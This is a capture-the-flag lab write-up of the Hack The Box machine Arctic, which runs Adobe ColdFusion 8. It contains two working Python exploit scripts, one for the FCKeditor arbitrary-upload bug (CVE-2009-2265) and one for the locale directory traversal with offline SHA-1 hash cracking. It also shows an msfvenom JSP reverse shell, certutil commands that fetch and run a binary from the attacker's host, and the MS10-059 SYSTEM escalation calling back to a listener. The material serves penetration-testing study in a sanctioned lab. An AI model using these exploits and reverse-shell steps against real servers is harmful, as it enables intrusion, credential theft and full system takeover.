HTB range series, Windows target: Arctic

Posted by pgrevents on Sun, 30 Jan 2022 06:10:34 +0100

The 30-second response delay configured on this target is truly painful. Seriously, every single action gives you enough time to scroll through your phone.

Reconnaissance

nmap

nmap -sS -p 1-65535 10.10.10.11     
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST
Nmap scan report for 10.10.10.11
Host is up (0.28s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 589.45 seconds

Port 8500 is open. The "fmtp" label is only nmap's port-table guess (no -sV was run), so connect with nc to see what actually answers:

nc 10.10.10.11 8500

After the usual 30-second wait a response comes back:
HTTP/1.0 200 OK
Date: Thu, 14 May 2020 18:48:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Server: JRun Web Server

<html>
<head>
<title>Index of /</title></head><body bgcolor="#ffffff">
<h1>Index of /</h1><br><hr><pre><a href="CFIDE/">CFIDE/</a>               <i>dir</i>   03/22/17 08:52 μμ
<a href="cfdocs/">cfdocs/</a>              <i>dir</i>   03/22/17 08:55 μμ
</pre><hr></html>

Then open it in a browser: directory listing is enabled. The CFIDE and cfdocs folders identify the application as Adobe ColdFusion, and the login page under /CFIDE/administrator/ shows it is ColdFusion 8. Now search for known vulnerabilities:

searchsploit coldfusion 8
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                        |  Path
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                                                                   | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                                                                                | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)                                                                   | multiple/remote/16985.rb
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution                           | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload                                                                         | multiple/webapps/45979.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass                                                             | windows/webapps/27755.txt
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection                                                       | multiple/webapps/40346.py
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting                          | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting       | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting                | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting                 | cfm/webapps/33168.txt
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution                                   | multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages                                                         | windows/local/19220.c
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                                     | cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure                                                                               | multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting                                                                 | cfm/remote/21548.txt
ColdFusion Scripts Red_Reservations - Database Disclosure                                                             | asp/webapps/7440.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure                                             | multiple/remote/22867.pl
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Two entries matter: the ColdFusion 8.0.1 arbitrary file upload / execution (AFU), and the directory traversal, which has been circulated widely (Baidu is full of it).

So there are two routes to a shell, both of which land as the ColdFusion service account, tolis:

RCE

First, the arbitrary file upload vulnerability:

ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                                     | cfm/webapps/16788.rb

Open the module and look at its references:

'CVE', '2009-2265' ],
                                        [ 'OSVDB', '55684'],

The CVE number is all we need from it. This is a Metasploit module, and rather than use msf we look for a standalone CVE-2009-2265 PoC; the one used here is a Python script from Exploit-DB.

After copying the script, edit the connection details at the bottom of the file:

if __name__ == '__main__':
    # Define some information
    lhost = '10.10.16.4'
    lport = 4444
    rhost = "10.10.10.11"
    rport = 8500
    filename = uuid.uuid4().hex

Set lhost and lport to your own VPN address and listening port.

Interestingly, rhost does not need to be changed, which suggests the PoC's author also wrote it while working on this HTB box.

This script does not need a separate nc listener; it opens the listener itself and hands you the shell directly.
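For reference, this is what the CVE-2009-2265 request actually looks like. It is an added example, not the PoC the post used: the FCKeditor CFM connector bundled with ColdFusion 8.0.1 validates the extension of the multipart filename but concatenates the CurrentFolder value into the destination path, so a harmless .txt upload ends up written as a .jsp. The connector path, the "NewFile" field name and the /userfiles/file/ destination are taken from the public exploit's behaviour; the target address and the benign marker JSP are assumptions (the post uploads an msfvenom reverse shell instead).

```python
"""Added example: the CVE-2009-2265 upload request that the Exploit-DB PoC
and the Metasploit module both send.  Not the script the post used; the
target address, file names and the JSP payload are assumptions."""
import http.client
import uuid

# FCKeditor CFM connector shipped with ColdFusion 8.0.1.
CONNECTOR = "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"

# Harmless JSP that only prints the account it runs under (assumed payload;
# the post uploads an msfvenom reverse shell instead).
MARKER_JSP = b'<%= "jsp running as " + System.getProperty("user.name") %>'


def upload_url(name):
    """Query string carrying the bug.  The connector checks the extension of
    the multipart *filename* (an innocuous .txt), but the CurrentFolder value
    is concatenated into the destination path unchecked; ending it with
    '.jsp%00' makes the server write <name>.jsp, and the NUL drops whatever
    the connector appends after it."""
    return f"{CONNECTOR}?Command=FileUpload&Type=File&CurrentFolder=/{name}.jsp%00"


def build_multipart(name, payload, boundary=""):
    """Return (body, content_type) for the single 'NewFile' part FCKeditor
    expects, carrying an innocuous .txt filename."""
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="NewFile"; filename="{name}.txt"\r\n'
        "Content-Type: text/plain\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + payload + tail, f"multipart/form-data; boundary={boundary}"


def uploaded_path(name):
    """Where the connector stores the file under the web root."""
    return f"/userfiles/file/{name}.jsp"


def upload(host, port, name, payload):
    """Send the request (network call; not exercised offline).  On success
    the connector answers 200 with an 'OnUploadCompleted' JavaScript stub,
    after which a GET of uploaded_path(name) executes the JSP."""
    body, ctype = build_multipart(name, payload)
    conn = http.client.HTTPConnection(host, port, timeout=90)
    conn.request("POST", upload_url(name), body=body,
                 headers={"Content-Type": ctype, "Content-Length": str(len(body))})
    resp = conn.getresponse()
    text = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, "OnUploadCompleted" in text


if __name__ == "__main__":
    # Assumed target: the box address and port from the post.
    name = uuid.uuid4().hex
    print(upload("10.10.10.11", 8500, name, MARKER_JSP), uploaded_path(name))
```

Remember the 30-second delay when setting timeouts: the default http.client timeout of a few seconds will give up before the box answers.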

File read vulnerability

Adobe ColdFusion - Directory Traversal - Multiple remote Exploit (exploit-db.com)

This is the exploit script for the vulnerability. If I had read the original write-up first I would not have spent so long on it without getting results. So skip the unreliable exploitation guides and honestly read the original documentation.

Later, while using it, I forgot that the target was a Windows system and searched for files according to a Linux filesystem layout, which wasted a lot of time. At one point I even thought the vulnerability had been patched. Only after getting a shell with the first method and looking at the directory layout did I realise that the Windows filesystem is different.

Exploitation:

The traversal can be triggered straight from the browser's address bar (the web server listens on 8500, not 80):

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

The contents of password.properties are echoed back in the login page; the password= line is the unsalted SHA-1 hash of the administrator password. Crack it (a hash lookup site or hashcat mode 100 both work) and log in to the administrator console with the recovered password.
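The request, the parsing of the echoed file and the offline hash check, as an added example that is not the post's script. The traversal depth and the sample page are assumptions; the sample password.properties is constructed here with a hash we made ourselves so that the whole thing runs offline.

```python
"""Added example for the locale traversal (CVE-2010-2861) the post exploits:
build the request, pull the key=value pairs of password.properties out of
the returned page, and test the SHA-1 hash offline against a wordlist.
Not the post's script; target, depth and sample data are assumptions."""
import hashlib
import http.client
import re

ENTER_CFM = "/CFIDE/administrator/enter.cfm"
# ColdFusion 8 keeps the administrator hash here (default install path).
TARGET_FILE = "ColdFusion8/lib/password.properties"


def traversal_url(depth=10, target=TARGET_FILE):
    """locale=../../..<target>%00en : the ../ run climbs out of the locale
    directory to the drive root, the NUL truncates the filename ColdFusion
    builds from the value, and the trailing 'en' keeps it looking like a
    locale name.  Extra ../ beyond the real depth are harmless on Windows."""
    return f"{ENTER_CFM}?locale={'../' * depth}{target}%00en"


def parse_properties(text):
    """Extract Java .properties pairs from a page that echoes the file.  Only
    lines that begin with a bare key= match, so surrounding HTML is ignored."""
    return dict(re.findall(r"^\s*([\w.]+)=(.*?)\s*$", text, re.MULTILINE))


def crack_sha1(hex_hash, wordlist):
    """ColdFusion 8 stores an unsalted uppercase-hex SHA-1 of the admin
    password, so a plain dictionary check is enough.  Returns the matching
    word or None."""
    want = hex_hash.strip().upper()
    for word in wordlist:
        if hashlib.sha1(word.encode()).hexdigest().upper() == want:
            return word
    return None


def fetch_properties(host, port):
    """Network helper (not run offline): GET the traversal URL and parse."""
    conn = http.client.HTTPConnection(host, port, timeout=90)
    conn.request("GET", traversal_url())
    page = conn.getresponse().read().decode("utf-8", "replace")
    conn.close()
    return parse_properties(page)


# Constructed sample: the layout of password.properties with a hash we made
# ourselves, wrapped in a little HTML to mimic how enter.cfm echoes it.
SAMPLE_PASSWORD = "example"
SAMPLE_PAGE = (
    "<html><body><p>\n"
    "#Wed Mar 22 20:53:51 EET 2017\n"
    "rdspassword=\n"
    f"password={hashlib.sha1(SAMPLE_PASSWORD.encode()).hexdigest().upper()}\n"
    "encrypted=true\n"
    "</p><form name='loginform' action='enter.cfm'>...</form></body></html>\n"
)

if __name__ == "__main__":
    # Offline run against the constructed page; swap in
    # fetch_properties("10.10.10.11", 8500) for the real box.
    props = parse_properties(SAMPLE_PAGE)
    print(traversal_url())
    print(props)
    print(crack_sha1(props["password"], ["admin", "password", SAMPLE_PASSWORD]))
```

The dictionary check is only there to show what the hash is; against a real hash use hashcat -m 100 with a proper wordlist.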

The administrator console can write files to disk through a scheduled task, which combined with the web-accessible CFIDE directory gives a shell.

First create a JSP reverse shell with msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f raw > exp.jsp

Then serve it with a Python web server:

python -m SimpleHTTPServer 80

Then create a task that downloads the payload from our machine:

Debugging & Logging -> Scheduled Tasks -> Schedule New Task

Fill in the URL of the payload file, http://10.10.16.7/exp.jsp, tick "Publish" (save output to a file) and set the output file to a path under the web root, for example C:\ColdFusion8\wwwroot\CFIDE\exp.jsp (C:\ColdFusion8\wwwroot is the default ColdFusion 8 web root). Submit, then run the task; after a moment a request arrives at the Python server and the file has been written.

The uploaded file now appears under /CFIDE on port 8500. Start the listener first:

nc -lvnp 4444

then browse to the JSP to execute it and the shell comes back.

Done

Privilege escalation to SYSTEM

Standard process

Run systeminfo to see the build and patch level:

C:\>systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 
System Boot Time:          14/5/2020, 9:38:49 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 261 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.199 MB
Virtual Memory: In Use:    848 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

Then feed that output to Windows-Exploit-Suggester to see which patches are missing (see the tool article for usage):

root@kali# /Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2020-05-13-mssb.xls --systeminfo sysinfo 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Most of the hits are Internet Explorer bugs, which are useless without an interactive desktop session. The local privilege escalation candidates are:

  • MS10-047
  • MS10-059
  • MS10-061
  • MS10-073
  • MS11-011
  • MS13-005

Following 0xdf's writeup, use MS10-059 (the "Chimichurri" exploit); a compiled binary is available from egre55's GitHub.

This one is simple.

After downloading it, serve it with the Python web server and fetch it on the target with certutil:

python -m SimpleHTTPServer 80

certutil.exe -urlcache -split -f "http://10.10.16.7/2.exe" 1.exe

.\1.exe 10.10.16.7 4444

The exploit connects back with a SYSTEM shell, so start an nc listener before running it, and use a port that is not already taken by the listener holding the current tolis shell.

 

Topics: Python Windows security penetration test Web Security